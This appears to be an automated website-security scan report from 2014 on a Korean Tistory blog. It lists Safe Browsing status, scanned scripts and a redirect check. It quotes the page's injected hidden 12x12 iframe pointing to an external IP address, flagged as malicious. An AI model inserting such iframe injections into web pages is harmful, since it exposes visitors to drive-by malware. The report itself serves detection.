Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=blog.nikegolf.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://blog.nikegolf.co.kr/ | 200 OK Content-Length: 68773 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 174.139.88.154 ...[4047 bytes skipped]... ndow.setTimeout("try { __pageTracker.__trackPageview(''); } catch(e) {}", 1); //]]>--> </script> <script type="text/javascript"> var roosevelt_params = { retargeting_id: "prnpub", tag_label: "daum.tistory" }; </script> <script type="text/javascript" src="http://adimg.daumcdn.net/rt/pub_dm/roosevelt.js"></script></body> <iframe src="http://174.139.88.154:6271/index.html" width="12" height="12" frameborder="12"></iframe> </html> Malicious iFrame found. size: 12x12 src: http://174.139.88.154:6271/index.html This URL is marked by Google as suspicious <iframe src="http://174.139.88.154:6271/index.html" width="12" height="12" frameborder="12"> | ||
http://s1.daumcdn.net/cfs.tistory/v/0/blog/plugins/findingNemo/FN_Script.js | 200 OK Content-Length: 1356 Content-Type: application/javascript | clean |
http://cfs.tistory.com/custom/blog/0/0/FindNemoData.js | 200 OK Content-Length: 7991 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/130613153857/blog/plugins/TistoryProfileLayer/profile.js | 200 OK Content-Length: 11362 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/120919102824/blog/script/lib/jigu/jigu-latest.min.js | 200 OK Content-Length: 49917 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/140903142108/blog/script/T.js | 200 OK Content-Length: 7354 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/121017170257/blog/script/EAF2.js | 200 OK Content-Length: 16600 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/140404091959/blog/script/common.js | 200 OK Content-Length: 56048 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/110613175039/blog/script/gallery.js | 200 OK Content-Length: 4691 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/0/blog/script/flash.js | 200 OK Content-Length: 10173 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/0/blog/script/PHON.js | 200 OK Content-Length: 3562 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/0/blog/script/swfobject.js | 200 OK Content-Length: 6887 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/0/blog/plugins/tatterDesk/js/ttDesk.js | 200 OK Content-Length: 28951 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/0/blog/plugins/tatterDesk/js/lib/prototype.js | 200 OK Content-Length: 60057 Content-Type: application/javascript | clean |
http://s1.daumcdn.net/cfs.tistory/v/0/blog/plugins/tatterDesk/js/src/builder.js | 200 OK Content-Length: 3961 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: blog.nikegolf.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: Keep-Alive
Date: Thu, 11 Sep 2014 11:32:32 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=85
P3P: CP='ALL DSP COR MON LAW OUR LEG DEL'
Set-Cookie: visited=1410435152; path=/; domain=blog.nikegolf.co.kr
X-UA-Compatible: IE=Edge
GET / HTTP/1.1
Host: blog.nikegolf.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: Keep-Alive
Date: Thu, 11 Sep 2014 11:32:32 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=85
P3P: CP='ALL DSP COR MON LAW OUR LEG DEL'
Set-Cookie: visited=1410435152; path=/; domain=blog.nikegolf.co.kr
X-UA-Compatible: IE=Edge
Second query (visit from search engine):
GET / HTTP/1.1
Host: blog.nikegolf.co.kr
Referer: http://www.google.com/search?q=blog.nikegolf.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: blog.nikegolf.co.kr
Referer: http://www.google.com/search?q=blog.nikegolf.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.